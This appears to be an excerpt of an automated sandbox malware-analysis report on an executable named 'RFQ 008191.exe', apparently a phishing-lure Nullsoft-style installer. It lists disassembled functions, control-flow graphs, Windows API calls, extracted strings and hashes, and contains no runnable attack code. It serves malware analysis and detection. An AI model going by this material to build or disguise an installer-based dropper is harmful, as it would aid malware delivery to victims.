                                                                    • Instruction Fuzzy Hash: 4FB139B1900608FFDB11AFA0DD89AAE7B79FB04354F40813AFA41B61A0CB744E51DF68
                                                                    Function 00406C5F Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 667 406c5f-406c64 668 406cd5-406cf3 667->668 669 406c66-406c95 667->669 670 4072cb-4072e0 668->670 671 406c97-406c9a 669->671 672 406c9c-406ca0 669->672 675 4072e2-4072f8 670->675 676 4072fa-407310 670->676 677 406cac-406caf 671->677 673 406ca2-406ca6 672->673 674 406ca8 672->674 673->677 674->677 678 407313-40731a 675->678 676->678 679 406cb1-406cba 677->679 680 406ccd-406cd0 677->680 684 407341-40734d 678->684 685 40731c-407320 678->685 681 406cbc 679->681 682 406cbf-406ccb 679->682 683 406ea2-406ec0 680->683 681->682 688 406d35-406d63 682->688 686 406ec2-406ed6 683->686 687 406ed8-406eea 683->687 694 406ae3-406aec 684->694 689 407326-40733e 685->689 690 4074cf-4074d9 685->690 692 406eed-406ef7 686->692 687->692 695 406d65-406d7d 688->695 696 406d7f-406d99 688->696 689->684 693 4074e5-4074f8 690->693 698 406ef9 692->698 699 406e9a-406ea0 692->699 697 4074fd-407501 693->697 700 406af2 694->700 701 4074fa 694->701 702 406d9c-406da6 695->702 696->702 721 407481-40748b 698->721 722 406e7f-406e97 698->722 699->683 710 406e3e-406e48 699->710 706 406af9-406afd 700->706 707 406c39-406c5a 700->707 708 406b9e-406ba2 700->708 709 406c0e-406c12 700->709 701->697 703 406dac 702->703 704 406d1d-406d23 702->704 727 406d02-406d1a 703->727 728 407469-407473 703->728 717 406dd6-406ddc 704->717 718 406d29-406d2f 704->718 706->693 714 406b03-406b10 706->714 707->670 712 406ba8-406bc1 708->712 713 40744e-407458 708->713 715 406c18-406c2c 709->715 716 40745d-407467 709->716 719 40748d-407497 710->719 720 406e4e-407017 710->720 723 406bc4-406bc8 712->723 713->693 714->701 726 406b16-406b5c 714->726 729 406c2f-406c37 715->729 716->693 724 406e3a 717->724 725 406dde-406dfc 717->725 718->688 718->724 719->693 720->694 721->693 722->699 723->708 731 406bca-406bd0 723->731 724->710 732 406e14-406e26 725->732 733 406dfe-406e12 725->733 734 406b84-406b86 726->734 735 406b5e-406b62 726->735 727->704 728->693 729->707 729->709 736 406bd2-406bd9 731->736 737 406bfa-406c0c 731->737 738 406e29-406e33 732->738 733->738 741 406b94-406b9c 734->741 742 406b88-406b92 734->742 739 406b64-406b67 GlobalFree 735->739 740 406b6d-406b7b GlobalAlloc 735->740 743 406be4-406bf4 GlobalAlloc 736->743 744 406bdb-406bde GlobalFree 736->744 737->729 738->717 745 406e35 738->745 739->740 740->701 746 406b81 740->746 741->723 742->741 742->742 743->701 743->737 744->743 748 407475-40747f 745->748 749 406dbb-406dd3 745->749 746->734 748->693 749->717
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c61fa70d481ae7decb37dc56cf27f7a4c6ea5b826eb98dd3ad332090416f9cd2
                                                                    • Instruction ID: db5d81fcbfa5be4a2d8af1487b95e9640f9c883cb1993a3fcb30b22963867ec5
                                                                    • Opcode Fuzzy Hash: c61fa70d481ae7decb37dc56cf27f7a4c6ea5b826eb98dd3ad332090416f9cd2
                                                                    • Instruction Fuzzy Hash: 87F17871D04229CBDF28CFA8C8946ADBBB0FF44305F25816ED456BB281D7786A86CF45
                                                                    Function 0040689E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 786 40689e-4068b2 FindFirstFileW 787 4068b4-4068bd FindClose 786->787 788 4068bf 786->788 789 4068c1-4068c2 787->789 788->789
                                                                    APIs
                                                                    • FindFirstFileW.KERNELBASE(771B3420,00425F58,00425710,00405F61,00425710,00425710,00000000,00425710,00425710,771B3420,?,C:\Users\user~1\AppData\Local\Temp\,00405C6D,?,771B3420,C:\Users\user~1\AppData\Local\Temp\), ref: 004068A9
                                                                    • FindClose.KERNEL32(00000000), ref: 004068B5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID: Find$CloseFileFirst
                                                                    • String ID: X_B
                                                                    • API String ID: 2295610775-941606717
                                                                    • Opcode ID: 368a1c0a689282c2aa5195ddf357efb180b92b440bed087baa82a07527058284
                                                                    • Instruction ID: f67f359cedd367be1f2f51a398ada2a6aadcf11014009cc1af4821528039bb17
                                                                    • Opcode Fuzzy Hash: 368a1c0a689282c2aa5195ddf357efb180b92b440bed087baa82a07527058284
                                                                    • Instruction Fuzzy Hash: 68D0123251A5205BC64067396E0C84B7B58AF153717268A36F5AAF21E0CB348C6A969C
                                                                    Function 00403FC1 Relevance: 51.4, APIs: 34, Instructions: 357windowstringCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 202 403fc1-403fd3 203 403fd9-403fdf 202->203 204 40413a-404149 202->204 203->204 205 403fe5-403fee 203->205 206 404198-4041ad 204->206 207 40414b-404193 GetDlgItem * 2 call 4044c0 SetClassLongW call 40140b 204->207 208 403ff0-403ffd SetWindowPos 205->208 209 404003-40400a 205->209 211 4041ed-4041f2 call 40450c 206->211 212 4041af-4041b2 206->212 207->206 208->209 214 40400c-404026 ShowWindow 209->214 215 40404e-404054 209->215 220 4041f7-404212 211->220 217 4041b4-4041bf call 401389 212->217 218 4041e5-4041e7 212->218 221 404127-404135 call 404527 214->221 222 40402c-40403f GetWindowLongW 214->222 223 404056-404068 DestroyWindow 215->223 224 40406d-404070 215->224 217->218 243 4041c1-4041e0 SendMessageW 217->243 218->211 219 40448d 218->219 231 40448f-404496 219->231 228 404214-404216 call 40140b 220->228 229 40421b-404221 220->229 221->231 222->221 230 404045-404048 ShowWindow 222->230 232 40446a-404470 223->232 234 404072-40407e SetWindowLongW 224->234 235 404083-404089 224->235 228->229 240 404227-404232 229->240 241 40444b-404464 DestroyWindow EndDialog 229->241 230->215 232->219 239 404472-404478 232->239 234->231 235->221 242 40408f-40409e GetDlgItem 235->242 239->219 244 40447a-404483 ShowWindow 239->244 240->241 245 404238-404285 call 40657e call 4044c0 * 3 GetDlgItem 240->245 241->232 246 4040a0-4040b7 SendMessageW IsWindowEnabled 242->246 247 4040bd-4040c0 242->247 243->231 244->219 274 404287-40428c 245->274 275 40428f-4042cb ShowWindow KiUserCallbackDispatcher call 4044e2 EnableWindow 245->275 246->219 246->247 249 4040c2-4040c3 247->249 250 4040c5-4040c8 247->250 251 4040f3-4040f8 call 404499 249->251 252 4040d6-4040db 250->252 253 4040ca-4040d0 250->253 251->221 255 404111-404121 SendMessageW 252->255 257 4040dd-4040e3 252->257 253->255 256 4040d2-4040d4 253->256 255->221 256->251 260 4040e5-4040eb call 40140b 257->260 261 4040fa-404103 call 40140b 257->261 270 4040f1 260->270 261->221 271 404105-40410f 261->271 270->251 271->270 274->275 278 4042d0 275->278 279 4042cd-4042ce 275->279 280 4042d2-404300 GetSystemMenu EnableMenuItem SendMessageW 278->280 279->280 281 404302-404313 SendMessageW 280->281 282 404315 280->282 283 40431b-40435a call 4044f5 call 403fa2 call 406541 lstrlenW call 40657e SetWindowTextW call 401389 281->283 282->283 283->220 294 404360-404362 283->294 294->220 295 404368-40436c 294->295 296 40438b-40439f DestroyWindow 295->296 297 40436e-404374 295->297 296->232 299 4043a5-4043d2 CreateDialogParamW 296->299 297->219 298 40437a-404380 297->298 298->220 300 404386 298->300 299->232 301 4043d8-40442f call 4044c0 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 299->301 300->219 301->219 306 404431-404444 ShowWindow call 40450c 301->306 308 404449 306->308 308->232
                                                                    APIs
                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FFD
                                                                    • ShowWindow.USER32(?), ref: 0040401D
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0040402F
                                                                    • ShowWindow.USER32(?,00000004), ref: 00404048
                                                                    • DestroyWindow.USER32 ref: 0040405C
                                                                    • SetWindowLongW.USER32(?,00000000,00000000), ref: 00404075
                                                                    • GetDlgItem.USER32(?,?), ref: 00404094
                                                                    • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004040A8
                                                                    • IsWindowEnabled.USER32(00000000), ref: 004040AF
                                                                    • GetDlgItem.USER32(?,00000001), ref: 0040415A
                                                                    • GetDlgItem.USER32(?,00000002), ref: 00404164
                                                                    • SetClassLongW.USER32(?,000000F2,?), ref: 0040417E
                                                                    • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041CF
                                                                    • GetDlgItem.USER32(?,00000003), ref: 00404275
                                                                    • ShowWindow.USER32(00000000,?), ref: 00404296
                                                                    • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004042A8
                                                                    • EnableWindow.USER32(?,?), ref: 004042C3
                                                                    • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042D9
                                                                    • EnableMenuItem.USER32(00000000), ref: 004042E0
                                                                    • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042F8
                                                                    • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040430B
                                                                    • lstrlenW.KERNEL32(00422F08,?,00422F08,00000000), ref: 00404335
                                                                    • SetWindowTextW.USER32(?,00422F08), ref: 00404349
                                                                    • ShowWindow.USER32(?,0000000A), ref: 0040447D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                    • String ID:
                                                                    • API String ID: 121052019-0
                                                                    • Opcode ID: 4b3fe02cb5795506d30df4e66f46237e59566fdbff82c58b44480cf0eb866077
                                                                    • Instruction ID: f4824fcfb4375dbde2e3aa314f90dcffafac0cdac9d9fdfce080a9e5a5e1030c
                                                                    • Opcode Fuzzy Hash: 4b3fe02cb5795506d30df4e66f46237e59566fdbff82c58b44480cf0eb866077
                                                                    • Instruction Fuzzy Hash: E7C1CEB1600200BBCB216F61EE49E2B3A68FB95719F41053EF751B11F0CB795882DB2E
                                                                    Function 00403C13 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215stringregistryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 309 403c13-403c2b call 406935 312 403c2d-403c3d call 406488 309->312 313 403c3f-403c76 call 40640f 309->313 322 403c99-403cc2 call 403ee9 call 405f18 312->322 318 403c78-403c89 call 40640f 313->318 319 403c8e-403c94 lstrcatW 313->319 318->319 319->322 327 403d54-403d5c call 405f18 322->327 328 403cc8-403ccd 322->328 334 403d6a-403d8f LoadImageW 327->334 335 403d5e-403d65 call 40657e 327->335 328->327 329 403cd3-403cfb call 40640f 328->329 329->327 336 403cfd-403d01 329->336 338 403e10-403e18 call 40140b 334->338 339 403d91-403dc1 RegisterClassW 334->339 335->334 340 403d13-403d1f lstrlenW 336->340 341 403d03-403d10 call 405e3d 336->341 350 403e22-403e2d call 403ee9 338->350 351 403e1a-403e1d 338->351 342 403dc7-403e0b SystemParametersInfoW CreateWindowExW 339->342 343 403edf 339->343 348 403d21-403d2f lstrcmpiW 340->348 349 403d47-403d4f call 405e10 call 406541 340->349 341->340 342->338 347 403ee1-403ee8 343->347 348->349 354 403d31-403d3b GetFileAttributesW 348->354 349->327 362 403e33-403e4d ShowWindow call 4068c5 350->362 363 403eb6-403eb7 call 405699 350->363 351->347 357 403d41-403d42 call 405e5c 354->357 358 403d3d-403d3f 354->358 357->349 358->349 358->357 370 403e59-403e6b GetClassInfoW 362->370 371 403e4f-403e54 call 4068c5 362->371 366 403ebc-403ebe 363->366 368 403ec0-403ec6 366->368 369 403ed8-403eda call 40140b 366->369 368->351 372 403ecc-403ed3 call 40140b 368->372 369->343 375 403e83-403ea6 DialogBoxParamW call 40140b 370->375 376 403e6d-403e7d GetClassInfoW RegisterClassW 370->376 371->370 372->351 380 403eab-403eb4 call 403b63 375->380 376->375 380->347
                                                                    APIs
                                                                      • Part of subcall function 00406935: GetModuleHandleA.KERNEL32(?,00000020,?,0040362C,0000000C,?,?,?,?,?,?,?,?), ref: 00406947
                                                                      • Part of subcall function 00406935: GetProcAddress.KERNEL32(00000000,?), ref: 00406962
                                                                    • lstrcatW.KERNEL32(1033,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000,00000002,771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\RFQ 008191.exe",00008001), ref: 00403C94
                                                                    • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user~1\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes,1033,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000,00000002,771B3420), ref: 00403D14
                                                                    • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user~1\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes,1033,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000), ref: 00403D27
                                                                    • GetFileAttributesW.KERNEL32(: Completed), ref: 00403D32
                                                                    • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user~1\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes), ref: 00403D7B
                                                                      • Part of subcall function 00406488: wsprintfW.USER32 ref: 00406495
                                                                    • RegisterClassW.USER32(004289C0), ref: 00403DB8
                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DD0
                                                                    • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403E05
                                                                    • ShowWindow.USER32(00000005,00000000), ref: 00403E3B
                                                                    • GetClassInfoW.USER32(00000000,RichEdit20W,004289C0), ref: 00403E67
                                                                    • GetClassInfoW.USER32(00000000,RichEdit,004289C0), ref: 00403E74
                                                                    • RegisterClassW.USER32(004289C0), ref: 00403E7D
                                                                    • DialogBoxParamW.USER32(?,00000000,00403FC1,00000000), ref: 00403E9C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                    • String ID: "C:\Users\user\Desktop\RFQ 008191.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user~1\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                    • API String ID: 1975747703-2058368676
                                                                    • Opcode ID: 5037b0ac7b0afaf53c36cfd73c50730ff94dd9e4d82060fed1f88605cc91a9c7
                                                                    • Instruction ID: 5b9c441e0465166458f669e0e2db1e5d0b29f952519833dd96bf398df7fa21fd
                                                                    • Opcode Fuzzy Hash: 5037b0ac7b0afaf53c36cfd73c50730ff94dd9e4d82060fed1f88605cc91a9c7
                                                                    • Instruction Fuzzy Hash: E661D570600300BAD620AF66DD46F3B3A7CEB84B49F81453FF941B61E2CB795952CA6D
                                                                    Function 004030A2 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 181memoryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 383 4030a2-4030f0 GetTickCount GetModuleFileNameW call 406031 386 4030f2-4030f7 383->386 387 4030fc-40312a call 406541 call 405e5c call 406541 GetFileSize 383->387 388 4032d2-4032d6 386->388 395 403130 387->395 396 403215-403223 call 40303e 387->396 397 403135-40314c 395->397 402 403225-403228 396->402 403 403278-40327d 396->403 399 403150-403159 call 4034be 397->399 400 40314e 397->400 409 40327f-403287 call 40303e 399->409 410 40315f-403166 399->410 400->399 405 40322a-403242 call 4034d4 call 4034be 402->405 406 40324c-403276 GlobalAlloc call 4034d4 call 4032d9 402->406 403->388 405->403 429 403244-40324a 405->429 406->403 434 403289-40329a 406->434 409->403 413 4031e2-4031e6 410->413 414 403168-40317c call 405fec 410->414 418 4031f0-4031f6 413->418 419 4031e8-4031ef call 40303e 413->419 414->418 432 40317e-403185 414->432 425 403205-40320d 418->425 426 4031f8-403202 call 406a22 418->426 419->418 425->397 433 403213 425->433 426->425 429->403 429->406 432->418 438 403187-40318e 432->438 433->396 435 4032a2-4032a7 434->435 436 40329c 434->436 439 4032a8-4032ae 435->439 436->435 438->418 440 403190-403197 438->440 439->439 441 4032b0-4032cb SetFilePointer call 405fec 439->441 440->418 442 403199-4031a0 440->442 445 4032d0 441->445 442->418 444 4031a2-4031c2 442->444 444->403 446 4031c8-4031cc 444->446 445->388 447 4031d4-4031dc 446->447 448 4031ce-4031d2 446->448 447->418 449 4031de-4031e0 447->449 448->433 448->447 449->418
                                                                    APIs
                                                                    • GetTickCount.KERNEL32 ref: 004030B3
                                                                    • GetModuleFileNameW.KERNEL32(00000000,00437800,00000400), ref: 004030CF
                                                                      • Part of subcall function 00406031: GetFileAttributesW.KERNELBASE(00000003,004030E2,00437800,80000000,00000003), ref: 00406035
                                                                      • Part of subcall function 00406031: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406057
                                                                    • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 0040311B
                                                                    • GlobalAlloc.KERNELBASE(00000040,?), ref: 00403251
                                                                    Strings
                                                                    • C:\Users\user\Desktop, xrefs: 004030FD, 00403102, 00403108
                                                                    • Inst, xrefs: 00403187
                                                                    • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403278
                                                                    • Null, xrefs: 00403199
                                                                    • "C:\Users\user\Desktop\RFQ 008191.exe", xrefs: 004030A8
                                                                    • Error launching installer, xrefs: 004030F2
                                                                    • C:\Users\user~1\AppData\Local\Temp\, xrefs: 004030A9
                                                                    • soft, xrefs: 00403190
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                    • String ID: "C:\Users\user\Desktop\RFQ 008191.exe"$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                    • API String ID: 2803837635-4175521791
                                                                    • Opcode ID: f6f149303cde104692999693530b98443d3dd0b2c967e283c98aa5a581eac7be
                                                                    • Instruction ID: 0f45a59523ef10b9f6d61eaf83b2f91e1f12d324a613ce28672a4e7bf9d48b30
                                                                    • Opcode Fuzzy Hash: f6f149303cde104692999693530b98443d3dd0b2c967e283c98aa5a581eac7be
                                                                    • Instruction Fuzzy Hash: 7B51B071A01304AFDB209F65DD86B9E7FACAB08356F20417BF504B62D1CB789E818B5D
                                                                    Function 0040657E Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 204stringCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 450 40657e-406587 451 406589-406598 450->451 452 40659a-4065b4 450->452 451->452 453 4067c4-4067ca 452->453 454 4065ba-4065c6 452->454 456 4067d0-4067dd 453->456 457 4065d8-4065e5 453->457 454->453 455 4065cc-4065d3 454->455 455->453 459 4067e9-4067ec 456->459 460 4067df-4067e4 call 406541 456->460 457->456 458 4065eb-4065f4 457->458 461 4067b1 458->461 462 4065fa-40663d 458->462 460->459 464 4067b3-4067bd 461->464 465 4067bf-4067c2 461->465 466 406643-40664f 462->466 467 406755-406759 462->467 464->453 465->453 468 406651 466->468 469 406659-40665b 466->469 470 40675b-406762 467->470 471 40678d-406791 467->471 468->469 474 406695-406698 469->474 475 40665d-406683 call 40640f 469->475 472 406772-40677e call 406541 470->472 473 406764-406770 call 406488 470->473 476 4067a1-4067af lstrlenW 471->476 477 406793-40679c call 40657e 471->477 488 406783-406789 472->488 473->488 481 40669a-4066a6 GetSystemDirectoryW 474->481 482 4066ab-4066ae 474->482 491 406689-406690 call 40657e 475->491 492 40673d-406740 475->492 476->453 477->476 489 406738-40673b 481->489 484 4066c0-4066c4 482->484 485 4066b0-4066bc GetWindowsDirectoryW 482->485 484->489 490 4066c6-4066e4 484->490 485->484 488->476 493 40678b 488->493 489->492 494 40674d-406753 call 4067ef 489->494 497 4066e6-4066ec 490->497 498 4066f8-406710 call 406935 490->498 491->489 492->494 495 406742-406748 lstrcatW 492->495 493->494 494->476 495->494 503 4066f4-4066f6 497->503 507 406712-406725 SHGetPathFromIDListW CoTaskMemFree 498->507 508 406727-406730 498->508 503->498 505 406732-406736 503->505 505->489 507->505 507->508 508->490 508->505
                                                                    APIs
                                                                    • GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 004066A0
                                                                    • GetWindowsDirectoryW.KERNEL32(: Completed,00000400,00000000,daniglacial,?,?,00000000,00000000,00418EC0,00000000), ref: 004066B6
                                                                    • SHGetPathFromIDListW.SHELL32(00000000,: Completed), ref: 00406714
                                                                    • CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 0040671D
                                                                    • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch,00000000,daniglacial,?,?,00000000,00000000,00418EC0,00000000), ref: 00406748
